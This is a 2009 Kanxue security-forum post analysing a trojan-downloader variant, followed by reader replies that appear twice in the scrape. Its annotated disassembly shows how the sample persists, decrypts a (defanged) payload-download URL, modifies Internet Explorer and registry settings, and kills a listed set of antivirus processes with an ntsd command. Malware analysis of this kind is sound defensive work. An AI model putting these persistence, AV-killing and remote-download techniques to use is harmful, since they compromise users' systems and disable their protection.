[原创]AV终结者新变种-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[原创]AV终结者新变种

发表于: 2009-1-22 12:46 17650

[原创]AV终结者新变种

冷血书生

2009-1-22 12:46

17650

一、病毒标签：
病毒名称：  AV终结者新变种TrojWare.Win32.TrojanDownloader.KillAV
病毒类型：  下载者
文件SHA1： 3ed481ed4280121aea776575a3417a45a2f833b2
危害等级：  3
文件长度：  脱壳前40,703 字节，脱壳后200,656 字节
受影响系统：Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Services Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
开发工具： Delphi
加壳类型： Upack 0.3.9 beta2s -> Dwing

二、病毒描述：
病毒复制自身到系统system\目录，文件名称jjxzwzjy090121.exe，并释放出jjxzajcj32dl.dll。劫持杀软，jjxzajcj32dl.dll注

入到ie后访问并下载大量病毒木马。

三、行为分析：
1、病毒复制自身到系统system\目录，文件名称jjxzwzjy090121.exe，并释放出jjxzajcj32dl.dll。

Upack:00178CA6                 call    @System@@LStrAsg$qqrpvpxv ; System::__linkproc__ LStrAsg(void *,void *)
.Upack:00178CAB                 push    offset aJjxzwzjy ; "jjxzwzjy"
.Upack:00178CB0                 push    dword_17B6E4
.Upack:00178CB6                 push    offset a_exe    ; ".exe"
.Upack:00178CBB                 mov     eax, offset dword_17B674
.Upack:00178CC0                 mov     edx, 3
.Upack:00178CC5                 call    @System@@LStrCatN$qqrv ; System::__linkproc__ LStrCatN(void)
.Upack:00178CCA                 mov     eax, offset dword_17B670
.Upack:00178CCF                 mov     ecx, dword_17B674
.Upack:00178CD5                 mov     edx, dword_17B6D0
.Upack:00178CDB                 call    @System@@LStrCat3$qqrv ; System::__linkproc__ LStrCat3(void)
.Upack:00178CE0                 mov     eax, offset dword_17B71C
.Upack:00178CE5                 mov     edx, dword_17B670 ; C:\WINDOWS\system\jjxzwzjy090121.exe

Upack:00178D3B                 call    CopyFileA       ; 将自身复制到C:\WINDOWS\system\jjxzwzjy090121.exe

Upack:00178F05                 call    sub_177E54      ; 修改注册表达到自启动目的
.Upack:00178F53                 call    modify_reg_     ; 修改注册表键值：dlncjjcdfc
.Upack:00178F53                                         ; 指向数据：%SystemRoot%\system\jjxzwzjy090102.exe，提权，遍

历进程

Upack:00178A58                 mov     eax, offset aStartup ; "Startup"
.Upack:00178A5D                 call    @System@@LStrCopy$qqrv ; System::__linkproc__ LStrCopy(void)
.Upack:00178A62                 mov     ecx, [ebp-28h]
.Upack:00178A65                 mov     edx, offset aSoftwareMicr_2 ; 

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
.Upack:00178A6A                 mov     eax, 80000001h
.Upack:00178A6F                 call    RegQueryValueExA_1 ; 注册表查询键值

Upack:00178A84                 mov     eax, offset a32333831303938 ; "323338313039383237363430363835326A777C7"...
.Upack:00178A89                 call    @Adodb@TCustomADODataSet@ClearCalcFields$qqrpc ; 

Adodb::TCustomADODataSet::ClearCalcFields(char *)
.Upack:00178A8E                 mov     edx, [ebp-2Ch]
.Upack:00178A91                 mov     eax, offset dword_17B720
.Upack:00178A96                 call    @System@@LStrAsg$qqrpvpxv ; System::__linkproc__ LStrAsg(void *,void *)
.Upack:00178A9B                 lea     edx, [ebp-30h]
.Upack:00178A9E                 mov     eax, dword_17B720
.Upack:00178AA3                 call    sub_174E44      ; 解密call，解密后为hxxp://www.a3168.com/mydown.asp

.Upack:00178B32                 call    sub_174A58      ; 提权
.Upack:00178B37                 call    sub_176E4C      ; avp.e

Upack:00178C8C                 call    sub_176960      ; 遍历枚举下列安全进程名，一旦发现尝试使用“ntsd -c q –p pid

”命令关闭该安全进程，实现自身的保护
.Upack:00178C8C                                         ; RUNIEP.exe
.Upack:00178C8C                                         ; KRegEx.exe
.Upack:00178C8C                                         ; KVXP.kxp
.Upack:00178C8C                                         ; 360tray.exe
.Upack:00178C8C                                         ; RSTray.exe
.Upack:00178C8C                                         ; QQDoctor.exe
.Upack:00178C8C                                         ; DrRtp.exe

Upack:00178E3C                 call    WritePrivateProfileStringA_0 ; 写入文件C:\Documents and Settings\All 

Users\jjjydf16.ini
.Upack:00178E3C                                         ; 内容为：
.Upack:00178E3C                                         ; [mydown]
.Upack:00178E3C                                         ; old_exe=
.Upack:00178E3C                                         ; old_dll32=
.Upack:00178E3C                                         ; ver=090121
.Upack:00178E3C                                         ; fnexe=C:\WINDOWS\system\jjxzwzjy090121.exe
.Upack:00178E3C                                         ; reg_start=dlmcjjcdfc
.Upack:00178E3C                                         ; fn_dll=C:\WINDOWS\system\jjxzajcj32dl.dll

Upack:001782A8                 mov     edx, offset aIexp ; "iexp"
.Upack:001782AD                 call    @System@@LStrCat$qqrv ; System::__linkproc__ LStrCat(void)
.Upack:001782B2                 mov     eax, ebx        ; iexplore.exe
.Upack:001782B4                 mov     edx, offset aLore_exe ; "lore.exe"
.Upack:001782B9                 call    @System@@LStrCat$qqrv ; System::__linkproc__ LStrCat(void)
.Upack:001782BE                 push    offset aNo      ; "no"
.Upack:001782C3                 mov     ecx, offset aCheck_associat ; "Check_Associations"
.Upack:001782C8                 mov     edx, offset aSoftwareMicros ; Software\Microsoft\Internet Explorer\Main
.Upack:001782CD                 mov     eax, 80000001h
.Upack:001782D2                 call    modify_reg_
.Upack:001782D7                 push    0               ; hKey
.Upack:001782D9                 mov     ecx, offset aEnableautodial ; "EnableAutodial"
.Upack:001782DE                 mov     edx, offset aSoftwareMicr_0 ; 

Software\Microsoft\Windows\CurrentVersion\Internet Settings
.Upack:001782E3                 mov     eax, 80000001h
.Upack:001782E8                 call    RegSetValueExA_0
.Upack:001782ED                 push    0               ; hKey
.Upack:001782EF                 mov     ecx, offset aNonetautodial ; "NoNetAutodial"
.Upack:001782F4                 mov     edx, offset aSoftwareMicr_0 ; 

Software\Microsoft\Windows\CurrentVersion\Internet Settings
.Upack:001782F9                 mov     eax, 80000001h
.Upack:001782FE                 call    RegSetValueExA_0
.Upack:00178303                 push    0               ; hKey
.Upack:00178305                 mov     ecx, offset aCheckedvalue ; "CheckedValue"
.Upack:0017830A                 mov     edx, offset aSoftwareMicr_1 ; 

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
.Upack:0017830F                 mov     eax, 80000002h
.Upack:00178314                 call    RegSetValueExA_0 ; 修改注册表键值
.Upack:00178319                 xor     eax, eax

登录后可查看完整内容

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！

收藏・7

免费・7

支持

最新回复 (28) 1 2 ▶
warcraft 雪币： 232 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 21 回帖 357 粉丝 0 关注私信	warcraft 2 楼顶....学习了~ 2009-1-22 12:49 0
sudami 雪币： 709 活跃值： (2420) 能力值： ( LV12，RANK：1010 ) 在线值：发帖 71 回帖 1581 粉丝 64 关注私信	sudami 25 3 楼建议分析厉害病毒。都是些老技术拼凑出来，没什么特点。 2009-1-22 12:52 0
小娃崽雪币： 383 活跃值： (41) 能力值： ( LV12，RANK：530 ) 在线值：发帖 42 回帖 283 粉丝 1 关注私信	小娃崽 13 4 楼坐书生的屁股~!我不乖~! 期待书生 2009-1-22 12:56 0
sdfcfy 雪币： 204 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 231 粉丝 0 关注私信	sdfcfy 5 楼好强啊！！！ 2009-1-22 12:58 0
冷血书生雪币： 443 活跃值： (200) 能力值： ( LV9，RANK：1140 ) 在线值：发帖 53 回帖 1135 粉丝 2 关注私信	冷血书生 28 6 楼只是学习一下病毒的行为，我是小菜啊啊，看了两个，眼睛都看花了！！！我水平太低了，努力！ 2009-1-22 12:58 0
sudami 雪币： 709 活跃值： (2420) 能力值： ( LV12，RANK：1010 ) 在线值：发帖 71 回帖 1581 粉丝 64 关注私信	sudami 25 7 楼哪里呀，弄点厉害病毒分析下(最好附带驱动)，我们也可以多学点嘛。 btw: 我什么壳都不会脱，加油ing 2009-1-22 13:01 0
冷血书生雪币： 443 活跃值： (200) 能力值： ( LV9，RANK：1140 ) 在线值：发帖 53 回帖 1135 粉丝 2 关注私信	冷血书生 28 8 楼没办法，驱动我只能识别而已！ 2009-1-22 13:04 0
kukisama 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	kukisama 9 楼很荣幸的来参观下书生的新作品 2009-1-22 13:15 0
快雪时晴雪币： 370 活跃值： (15) 能力值： ( LV9，RANK：170 ) 在线值：发帖 34 回帖 2272 粉丝 1 关注私信	快雪时晴 4 10 楼哪有那么多新技术，有效的就是最好的 2009-1-22 14:53 0
newjueqi 雪币： 251 活跃值： (25) 能力值： ( LV9，RANK：290 ) 在线值：发帖 22 回帖 392 粉丝 2 关注私信	newjueqi 7 11 楼期待精通驱动的牛人出手 2009-1-22 15:15 0
newjueqi 雪币： 251 活跃值： (25) 能力值： ( LV9，RANK：290 ) 在线值：发帖 22 回帖 392 粉丝 2 关注私信	newjueqi 7 12 楼同意，想想“熊猫”就知道另一方面，无论技术怎么发展，在攻防过程中最容易突破的都是人 2009-1-22 15:16 0
Lenus 雪币： 159 活跃值： (339) 能力值： ( LV8，RANK：130 ) 在线值：发帖 17 回帖 394 粉丝 22 关注私信	Lenus 3 13 楼病毒名称： AV终结者新变种TrojWare.Win32.TrojanDownloader.KillAV 建议注明是哪家AV报的名称 2009-1-22 15:34 0
yezhou 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	yezhou 14 楼新的病毒可能只是集百家之所长 2009-1-22 21:36 0
老Y 雪币： 163 活跃值： (60) 能力值： ( LV9，RANK：210 ) 在线值：发帖 8 回帖 147 粉丝 2 关注私信	老Y 5 15 楼支持一下。。。。。。。。。。。。。 2009-1-22 21:58 0
Nisy 雪币： 167 活跃值： (1574) 能力值： ( LV9，RANK：250 ) 在线值：发帖 68 回帖 668 粉丝 42 关注私信	Nisy 5 16 楼来顶一下过年还送好文章的仁兄 2009-1-22 22:20 0
combojiang 雪币： 321 活跃值： (271) 能力值： ( LV13，RANK：1050 ) 在线值：发帖 44 回帖 765 粉丝 55 关注私信	combojiang 26 17 楼支持，期待更多作品。 2009-1-23 09:30 0
pentacleNC 雪币： 279 活跃值： (160) 能力值： ( LV9，RANK：170 ) 在线值：发帖 13 回帖 144 粉丝 0 关注私信	pentacleNC 4 18 楼就是书生自报的 2009-1-23 13:55 0
西域雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	西域 19 楼书生确实很厉害学习一下 2009-1-24 00:04 0
Fido 雪币： 107 活跃值： (404) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 1019 粉丝 1 关注私信	Fido 20 楼支持啊..................支持....膜拜楼主 2009-1-24 18:10 0
sisisi 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	sisisi 21 楼问一下书生怎么解密的网址啊指教一下用防火墙么还是网络端口查看工具啊指教一下 QQ 610774680 谢谢 2009-1-24 22:09 0
xss 雪币： 471 活跃值： (4003) 能力值： ( LV9，RANK：170 ) 在线值：发帖 9 回帖 314 粉丝 5 关注私信	xss 4 22 楼都是些老技术的拼盘，的确没有意思啊 2009-1-25 10:38 0
nimda 雪币： 197 活跃值： (52) 能力值： ( LV5，RANK：70 ) 在线值：发帖 4 回帖 56 粉丝 1 关注私信	nimda 1 23 楼新鲜的病毒不是很多(⊙o⊙)哦 2009-1-25 16:20 0
saga 雪币： 224 活跃值： (10) 能力值： ( LV6，RANK：90 ) 在线值：发帖 10 回帖 120 粉丝 0 关注私信	saga 2 24 楼还会有下个 CIH 吗 2009-2-6 17:22 0
FigoY 雪币： 104 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	FigoY 25 楼 Mark~ 2009-10-10 13:49 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

冷血书生

发帖

1135

回帖

1140

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (28) 1 2 ▶
warcraft 雪币： 232 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 21 回帖 357 粉丝 0 关注私信	warcraft 2 楼顶....学习了~ 2009-1-22 12:49 0
sudami 雪币： 709 活跃值： (2420) 能力值： ( LV12，RANK：1010 ) 在线值：发帖 71 回帖 1581 粉丝 64 关注私信	sudami 25 3 楼建议分析厉害病毒。都是些老技术拼凑出来，没什么特点。 2009-1-22 12:52 0
小娃崽雪币： 383 活跃值： (41) 能力值： ( LV12，RANK：530 ) 在线值：发帖 42 回帖 283 粉丝 1 关注私信	小娃崽 13 4 楼坐书生的屁股~!我不乖~! 期待书生 2009-1-22 12:56 0
sdfcfy 雪币： 204 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 231 粉丝 0 关注私信	sdfcfy 5 楼好强啊！！！ 2009-1-22 12:58 0
冷血书生雪币： 443 活跃值： (200) 能力值： ( LV9，RANK：1140 ) 在线值：发帖 53 回帖 1135 粉丝 2 关注私信	冷血书生 28 6 楼只是学习一下病毒的行为，我是小菜啊啊，看了两个，眼睛都看花了！！！我水平太低了，努力！ 2009-1-22 12:58 0
sudami 雪币： 709 活跃值： (2420) 能力值： ( LV12，RANK：1010 ) 在线值：发帖 71 回帖 1581 粉丝 64 关注私信	sudami 25 7 楼哪里呀，弄点厉害病毒分析下(最好附带驱动)，我们也可以多学点嘛。 btw: 我什么壳都不会脱，加油ing 2009-1-22 13:01 0
冷血书生雪币： 443 活跃值： (200) 能力值： ( LV9，RANK：1140 ) 在线值：发帖 53 回帖 1135 粉丝 2 关注私信	冷血书生 28 8 楼没办法，驱动我只能识别而已！ 2009-1-22 13:04 0
kukisama 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	kukisama 9 楼很荣幸的来参观下书生的新作品 2009-1-22 13:15 0
快雪时晴雪币： 370 活跃值： (15) 能力值： ( LV9，RANK：170 ) 在线值：发帖 34 回帖 2272 粉丝 1 关注私信	快雪时晴 4 10 楼哪有那么多新技术，有效的就是最好的 2009-1-22 14:53 0
newjueqi 雪币： 251 活跃值： (25) 能力值： ( LV9，RANK：290 ) 在线值：发帖 22 回帖 392 粉丝 2 关注私信	newjueqi 7 11 楼期待精通驱动的牛人出手 2009-1-22 15:15 0
newjueqi 雪币： 251 活跃值： (25) 能力值： ( LV9，RANK：290 ) 在线值：发帖 22 回帖 392 粉丝 2 关注私信	newjueqi 7 12 楼同意，想想“熊猫”就知道另一方面，无论技术怎么发展，在攻防过程中最容易突破的都是人 2009-1-22 15:16 0
Lenus 雪币： 159 活跃值： (339) 能力值： ( LV8，RANK：130 ) 在线值：发帖 17 回帖 394 粉丝 22 关注私信	Lenus 3 13 楼病毒名称： AV终结者新变种TrojWare.Win32.TrojanDownloader.KillAV 建议注明是哪家AV报的名称 2009-1-22 15:34 0
yezhou 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	yezhou 14 楼新的病毒可能只是集百家之所长 2009-1-22 21:36 0
老Y 雪币： 163 活跃值： (60) 能力值： ( LV9，RANK：210 ) 在线值：发帖 8 回帖 147 粉丝 2 关注私信	老Y 5 15 楼支持一下。。。。。。。。。。。。。 2009-1-22 21:58 0
Nisy 雪币： 167 活跃值： (1574) 能力值： ( LV9，RANK：250 ) 在线值：发帖 68 回帖 668 粉丝 42 关注私信	Nisy 5 16 楼来顶一下过年还送好文章的仁兄 2009-1-22 22:20 0
combojiang 雪币： 321 活跃值： (271) 能力值： ( LV13，RANK：1050 ) 在线值：发帖 44 回帖 765 粉丝 55 关注私信	combojiang 26 17 楼支持，期待更多作品。 2009-1-23 09:30 0
pentacleNC 雪币： 279 活跃值： (160) 能力值： ( LV9，RANK：170 ) 在线值：发帖 13 回帖 144 粉丝 0 关注私信	pentacleNC 4 18 楼就是书生自报的 2009-1-23 13:55 0
西域雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	西域 19 楼书生确实很厉害学习一下 2009-1-24 00:04 0
Fido 雪币： 107 活跃值： (404) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 1019 粉丝 1 关注私信	Fido 20 楼支持啊..................支持....膜拜楼主 2009-1-24 18:10 0
sisisi 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	sisisi 21 楼问一下书生怎么解密的网址啊指教一下用防火墙么还是网络端口查看工具啊指教一下 QQ 610774680 谢谢 2009-1-24 22:09 0
xss 雪币： 471 活跃值： (4003) 能力值： ( LV9，RANK：170 ) 在线值：发帖 9 回帖 314 粉丝 5 关注私信	xss 4 22 楼都是些老技术的拼盘，的确没有意思啊 2009-1-25 10:38 0
nimda 雪币： 197 活跃值： (52) 能力值： ( LV5，RANK：70 ) 在线值：发帖 4 回帖 56 粉丝 1 关注私信	nimda 1 23 楼新鲜的病毒不是很多(⊙o⊙)哦 2009-1-25 16:20 0
saga 雪币： 224 活跃值： (10) 能力值： ( LV6，RANK：90 ) 在线值：发帖 10 回帖 120 粉丝 0 关注私信	saga 2 24 楼还会有下个 CIH 吗 2009-2-6 17:22 0
FigoY 雪币： 104 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	FigoY 25 楼 Mark~ 2009-10-10 13:49 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复